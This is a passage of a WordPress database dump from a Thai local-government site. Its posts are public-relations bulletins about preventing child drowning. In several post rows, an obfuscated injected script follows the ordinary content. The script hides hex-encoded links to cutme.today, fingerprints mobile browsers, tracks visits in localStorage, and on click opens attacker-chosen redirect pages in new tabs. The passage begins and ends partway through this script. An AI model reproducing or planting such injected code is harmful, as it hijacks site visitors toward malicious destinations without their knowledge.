'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','402-revision-v1','','','2024-08-01 20:39:01','2024-08-01 13:39:01','',402,'http://pakhaeng.ssk.in.th/?p=404',0,'revision','',0),
(405,1,'2024-08-01 20:40:04','2024-08-01 13:40:04','<!-- wp:paragraph -->\n<p><strong>แนวทางการป้องกัน</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>ระวังเด็กจมน้ำ</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":406,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/12-2567-724x1024.png\" alt=\"\" class=\"wp-image-406\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-24','','','2024-08-01 20:40:07','2024-08-01 13:40:07','',0,'http://pakhaeng.ssk.in.th/?p=405',0,'post','',0),
(406,1,'2024-08-01 20:39:48','2024-08-01 13:39:48','','12-2567','','inherit','','closed','','12-2567','','','2024-08-01 20:39:48','2024-08-01 13:39:48','',405,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/12-2567.png',0,'attachment','image/png',0),
(407,1,'2024-08-01 20:40:04','2024-08-01 13:40:04','<!-- wp:paragraph -->\n<p><strong>แนวทางการป้องกัน</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>ระวังเด็กจมน้ำ</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":406,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/12-2567-724x1024.png\" alt=\"\" class=\"wp-image-406\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 